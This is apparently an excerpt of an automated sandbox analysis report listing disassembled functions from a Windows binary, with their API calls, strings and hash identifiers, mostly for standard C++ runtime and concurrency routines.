                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                      • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                      • API String ID: 1383202999-2891247106
                                      • Opcode ID: 5f5eb3a423225f679f86bd47ef5c366fb7448ca7862251f47048fbf6219d98cf
                                      • Instruction ID: b436b376ac32891685d665c361d08dfb69ed26dda9c52e796deab39bb4af0b3c
                                      • Opcode Fuzzy Hash: 5f5eb3a423225f679f86bd47ef5c366fb7448ca7862251f47048fbf6219d98cf
                                      • Instruction Fuzzy Hash: 04A1467290020AEFCF05DF94C892EFE7BBAEB49304F00491AFA55A6291E7359910DF61
                                      Function 00925570 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 131COMMON
                                      Download Yara Rule
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?), ref: 009255AA
                                      • GetLastError.KERNEL32(0000000A), ref: 009255D5
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00925616
                                      Strings
                                      • Timer: QueryPerformanceCounter failed with error , xrefs: 009255F0
                                      • Timer: QueryPerformanceFrequency failed with error , xrefs: 009256DB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CounterErrorException@8LastPerformanceQueryThrow
                                      • String ID: Timer: QueryPerformanceCounter failed with error $Timer: QueryPerformanceFrequency failed with error
                                      • API String ID: 651023626-2136607233
                                      • Opcode ID: 42f3e45ea6d4629e70c5a2e49475bff41f17200dc436cbd170721b0d87a79d01
                                      • Instruction ID: 933d8fe2aab088d68ab2d4c038b4b6be3a5814b776461e5c1e832ce12e621bcb
                                      • Opcode Fuzzy Hash: 42f3e45ea6d4629e70c5a2e49475bff41f17200dc436cbd170721b0d87a79d01
                                      • Instruction Fuzzy Hash: 17414BB1D44348EBDB10EFA8DC45F9EB7B8FB44714F50462AF819A7282DB74A604CB51
                                      Function 0095653C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00956555
                                        • Part of subcall function 00956824: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00956288), ref: 00956834
                                      • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0095656A
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00956579
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00956587
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0095663D
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0095664B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::Exception@8Throwstd::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                                      • String ID: pContext$switchState
                                      • API String ID: 2757187270-2660820399
                                      • Opcode ID: 43e0df430d5f6f1ded3d68cc628c17ecb9df4bf086514bd3f4d63505066d1408
                                      • Instruction ID: a1e7cc412e87fbf79ddd548ac1bafb3d70b74b3f70a47bf58565ad57b4cb8a34
                                      • Opcode Fuzzy Hash: 43e0df430d5f6f1ded3d68cc628c17ecb9df4bf086514bd3f4d63505066d1408
                                      • Instruction Fuzzy Hash: EE31D675A00214ABCF04EF69C885E6D77B9BF84315F604569ED11A7245EB70EE0AC790
                                      Function 00948362 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00948382
                                      • Concurrency::details::SchedulingNode::AddVirtualProcessor.LIBCONCRT ref: 009483D1
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 009483F4
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00948402
                                      • __EH_prolog3.LIBCMT ref: 0094840F
                                      • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00948436
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CacheConcurrency::details::GroupLocalSchedulestd::invalid_argument::invalid_argument$Exception@8H_prolog3Node::ProcessorSchedulingSegmentSegment::ThrowVirtual
                                      • String ID: count$ppVirtualProcessorRoots
                                      • API String ID: 3227653198-3650809737
                                      • Opcode ID: d6fccda53765857c2b3814c06bf6ed502356d0734681181234d2810072f7d940
                                      • Instruction ID: 444c0a19dda923292483f40cfc93d7b0a7650acbdd2027dfe50cbb7b02e02d99
                                      • Opcode Fuzzy Hash: d6fccda53765857c2b3814c06bf6ed502356d0734681181234d2810072f7d940
                                      • Instruction Fuzzy Hash: 5C21C435A00215EFCB08EFA8C896FAE77B5BF88704F004069F506A7291DF70AE01CB50
                                      Function 00960367 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 76COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • DName::DName.LIBVCRUNTIME ref: 00960394
                                      • UnDecorator::getSignedDimension.LIBCMT ref: 009603A7
                                      • DName::getString.LIBVCRUNTIME ref: 009603CC
                                      • DName::DName.LIBVCRUNTIME ref: 009603FD
                                        • Part of subcall function 0095BA28: DName::doPchar.LIBVCRUNTIME ref: 0095BA4F
                                      • DName::operator+.LIBCMT ref: 0096040C
                                        • Part of subcall function 0095BD6A: DName::operator+=.LIBVCRUNTIME ref: 0095BD80
                                      • DName::operator+.LIBCMT ref: 0096041A
                                        • Part of subcall function 0095BDAE: DName::operator+=.LIBCMT ref: 0095BDC4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: NameName::Name::operator+Name::operator+=$Decorator::getDimensionName::doName::getPcharSignedString
                                      • String ID: `template-parameter$void
                                      • API String ID: 2542415585-4057429177
                                      • Opcode ID: 6aeaf2b853e1d7eeeaa61190529d85e30e8db037873132a04744184db65baec6
                                      • Instruction ID: d6143f234ff531f8c1ca4395932bd36fc129cb75c80fc5682135b347bfb4859e
                                      • Opcode Fuzzy Hash: 6aeaf2b853e1d7eeeaa61190529d85e30e8db037873132a04744184db65baec6
                                      • Instruction Fuzzy Hash: 4121C572A152089BCB14EBA5DC92FFF73B8EB84312F60401AE502A2191EF746D49D760
                                      Function 0095CE45 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 0095CE65
                                        • Part of subcall function 0095CD4F: Replicator::operator[].LIBVCRUNTIME ref: 0095CDBB
                                        • Part of subcall function 0095CD4F: DName::operator+=.LIBVCRUNTIME ref: 0095CDC3
                                      • DName::operator+.LIBCMT ref: 0095CEBC
                                      • DName::DName.LIBVCRUNTIME ref: 0095CF05
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                      • API String ID: 834187326-2211150622
                                      • Opcode ID: f97274909eeff3b542b2d7a834b0a3c93361e2f78a82e182f05cca10d1bdb74a
                                      • Instruction ID: 33003db35b911fdc47dd3311e33237a6e9ff8f0ed732c97c341d90c30bb6c001
                                      • Opcode Fuzzy Hash: f97274909eeff3b542b2d7a834b0a3c93361e2f78a82e182f05cca10d1bdb74a
                                      • Instruction Fuzzy Hash: 232181B0226304DFCB14DF1ED852B663FE9EB15346F144459E885DB262CB30DD89DB50
                                      Function 0095D0C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • UnDecorator::UScore.LIBVCRUNTIME ref: 0095D0C8
                                      • DName::DName.LIBVCRUNTIME ref: 0095D0D2
                                        • Part of subcall function 0095BA28: DName::doPchar.LIBVCRUNTIME ref: 0095BA4F
                                      • UnDecorator::getScopedName.LIBVCRUNTIME ref: 0095D111
                                      • DName::operator+=.LIBVCRUNTIME ref: 0095D11B
                                      • DName::operator+=.LIBCMT ref: 0095D12A
                                      • DName::operator+=.LIBCMT ref: 0095D136
                                      • DName::operator+=.LIBCMT ref: 0095D143
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                      • String ID: void
                                      • API String ID: 1480779885-3531332078
                                      • Opcode ID: e12909b97f1d9474ff99f552d17774559c330c16cbafb24eef76e064f01c45d5
                                      • Instruction ID: ddb9f89c9c2294a40ac65f79fd96e8b9f30a22c5e2a94a372f0d06da54648c58
                                      • Opcode Fuzzy Hash: e12909b97f1d9474ff99f552d17774559c330c16cbafb24eef76e064f01c45d5
                                      • Instruction Fuzzy Hash: 2E11E170509604AFCB08EF6ACA56BBDBB74EF41306F044489F8025B2D2DB709D4DCB90
                                      Function 0098412D Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCPInfo.KERNEL32(009640B8,?,00000000,7FFFFFFF,?,?,00984406,009640B8,009640B8,?,?,?,?,?,?,?), ref: 009841D9
                                      • MultiByteToWideChar.KERNEL32(009640B8,00000009,009640B8,?,00000000,00000000,?,00984406,009640B8,009640B8,?,?,?,?,?,?), ref: 0098425C
                                      • __alloca_probe_16.LIBCMT ref: 00984294
                                      • MultiByteToWideChar.KERNEL32(009640B8,00000001,009640B8,?,00000000,00984406,?,00984406,009640B8,009640B8,?,?,?,?,?,?), ref: 009842EF
                                      • __alloca_probe_16.LIBCMT ref: 0098433E
                                      • MultiByteToWideChar.KERNEL32(009640B8,00000009,009640B8,009640B8,00000000,00000000,?,00984406,009640B8,009640B8,?,?,?,?,?,?), ref: 00984306
                                        • Part of subcall function 00976393: RtlAllocateHeap.NTDLL(00000000,?,?,?,0095833C,?,?,?,?,?,008B1F07,?,?,?), ref: 009763C5
                                      • MultiByteToWideChar.KERNEL32(009640B8,00000001,009640B8,009640B8,00000000,009640B8,?,00984406,009640B8,009640B8,?,?,?,?,?,?), ref: 00984382
                                      • __freea.LIBCMT ref: 009843AD
                                      • __freea.LIBCMT ref: 009843B9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                      • String ID:
                                      • API String ID: 201697637-0
                                      • Opcode ID: d908a5d835594f3b0e30ce9722d1eb7c523c5a33281310be67ff8316966fadcb
                                      • Instruction ID: f4dd63015506550e4963a2d12f18b77c26a87ea3da0349d8a26d7c91837a3187
                                      • Opcode Fuzzy Hash: d908a5d835594f3b0e30ce9722d1eb7c523c5a33281310be67ff8316966fadcb
                                      • Instruction Fuzzy Hash: A891D571E0421B9BDF20AE64CD85EEEBBB9AF55714F14461AE805E7380D739DC80CBA0
                                      Function 0093F2F0 Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetEvent.KERNEL32(00000000,BA3649C5), ref: 0093F369
                                      • SetEvent.KERNEL32(00000000,BA3649C5), ref: 0093F3C6
                                      • ReleaseSemaphore.KERNEL32(?,?,00000000,BA3649C5), ref: 0093F3DA
                                      • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 0093F3FF
                                      • CloseHandle.KERNEL32(?), ref: 0093F433
                                      • SetEvent.KERNEL32(00000000), ref: 0093F470
                                        • Part of subcall function 008B50A0: CreateEventA.KERNEL32(?,?,?,?,BA3649C5,BA3649C5,?,009404E2,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000), ref: 008B50D4
                                        • Part of subcall function 008B50A0: CloseHandle.KERNEL32(00000000,?,009404E2,?,BA3649C5,BA3649C5,?,?,?,00000000,00000000,BA3649C5,BA3649C5), ref: 008B50EF
                                      • SetEvent.KERNEL32(00000000,?,BA3649C5), ref: 0093F4F8
                                      • CloseHandle.KERNEL32(?,BA3649C5), ref: 0093F526
                                      • CloseHandle.KERNEL32(?,BA3649C5), ref: 0093F603
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Event$CloseHandle$ReleaseSemaphore$Create
                                      • String ID:
                                      • API String ID: 573037752-0
                                      • Opcode ID: c5020070469a6f7d694a1e7942642a9c46f20e307fdd531098b5049243e31aa4
                                      • Instruction ID: 8d3cdcdc56253af6ac4ade10827b981d719b428689eb600e2741801f4abd58a3
                                      • Opcode Fuzzy Hash: c5020070469a6f7d694a1e7942642a9c46f20e307fdd531098b5049243e31aa4
                                      • Instruction Fuzzy Hash: 83A1AD71D002099BDF15DF28C89876EB7A9FF44328F244269E818AB2A1D739ED45CF91
                                      Function 0094AD9C Relevance: 13.6, APIs: 9, Instructions: 106timeCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0094ADBE
                                        • Part of subcall function 00949188: __EH_prolog3_catch.LIBCMT ref: 0094918F
                                        • Part of subcall function 00949188: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 009491C8
                                      • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 0094ADCC
                                        • Part of subcall function 00949DE5: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00949E0A
                                        • Part of subcall function 00949DE5: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00949E2D
                                      • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0094ADE5
                                      • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0094ADF1
                                        • Part of subcall function 00949188: InterlockedPopEntrySList.KERNEL32(?), ref: 00949211
                                        • Part of subcall function 00949188: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00949240
                                        • Part of subcall function 00949188: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 0094924E
                                      • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 0094AE3D
                                      • Concurrency::location::_Assign.LIBCMT ref: 0094AE5E
                                      • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 0094AE66
                                      • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 0094AE78
                                      • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 0094AEA8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                                      • String ID:
                                      • API String ID: 2678502038-0
                                      • Opcode ID: 5ecbc7f888ba72d85bb0d4fac46a3f1e6bdeee6630c2e38165c2391fb86081a2
                                      • Instruction ID: 8813035ef570060b018b847f5ce8213b823c4f492556ccd0319d3f84dbb87253
                                      • Opcode Fuzzy Hash: 5ecbc7f888ba72d85bb0d4fac46a3f1e6bdeee6630c2e38165c2391fb86081a2
                                      • Instruction Fuzzy Hash: 9F314E30B842516FDF15AB784882FFF77B95F95304F0405A9D462D7282DB248D49C793
                                      Function 008BD610 Relevance: 12.4, APIs: 8, Instructions: 350fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00008003,BA3649C5,00000000,76233560), ref: 008BD66D
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,08000000,00000000), ref: 008BD695
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 008BD6EE
                                      • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 008BD728
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,-009D0110,00000000,-009D0110,00000000), ref: 008BD79F
                                      • SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 008BD92B
                                      • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00000000,00000000,00000001), ref: 008BD967
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000,00000001), ref: 008BD96E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: File$Pointer$CloseCreateErrorHandleModeReadSizeWrite
                                      • String ID:
                                      • API String ID: 1214154791-0
                                      • Opcode ID: 9c131f554c24d56d6ebbf1b13897ec23a166700c21bc9380bdf1be8f81f89838
                                      • Instruction ID: 002b873a9d7d533e8e65bc5a697d28306ca8b8777206d75d9ff22828932c3730
                                      • Opcode Fuzzy Hash: 9c131f554c24d56d6ebbf1b13897ec23a166700c21bc9380bdf1be8f81f89838
                                      • Instruction Fuzzy Hash: 51D1AB70901358EBEB25DFA8CC85BDEBBB5FB45304F208199E418AB291E7B45A84CF51
                                      Function 0094F798 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog3.LIBCMT ref: 0094F79F
                                      • List.LIBCONCRT ref: 0094F81D
                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0094F842
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0094F850
                                      • __EH_prolog3.LIBCMT ref: 0094F85D
                                      • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0094F881
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FreeH_prolog3ProcessorVirtual$Concurrency::details::Exception@8ListRootRoot::Throwstd::invalid_argument::invalid_argument
                                      • String ID: pExecutionResource
                                      • API String ID: 721108208-359481074
                                      • Opcode ID: 2d338a8bd1235303fb9945d7e200747cf0e3c735c3dcd72066692c9544b8a52d
                                      • Instruction ID: 63f85c24f3e0ce04d138b225a07dde6a9201ce9d17fa1f3c717bdebf486cbc5e
                                      • Opcode Fuzzy Hash: 2d338a8bd1235303fb9945d7e200747cf0e3c735c3dcd72066692c9544b8a52d
                                      • Instruction Fuzzy Hash: 342196B5A40705ABCB08EF64C892FAD77A5BFC8300F514029F9056B391DBB4AE45CB91
                                      Function 0097459F Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,7FFFFFFF,00000000,?,?,?,009747F0,00000001,00000001,FF76E900), ref: 009745F9
                                      • __alloca_probe_16.LIBCMT ref: 00974631
                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,009747F0,00000001,00000001,FF76E900,?,?,?), ref: 0097467F
                                      • __alloca_probe_16.LIBCMT ref: 00974716
                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,FF76E900,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00974779
                                      • __freea.LIBCMT ref: 00974786
                                        • Part of subcall function 00976393: RtlAllocateHeap.NTDLL(00000000,?,?,?,0095833C,?,?,?,?,?,008B1F07,?,?,?), ref: 009763C5
                                      • __freea.LIBCMT ref: 0097478F
                                      • __freea.LIBCMT ref: 009747B4
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
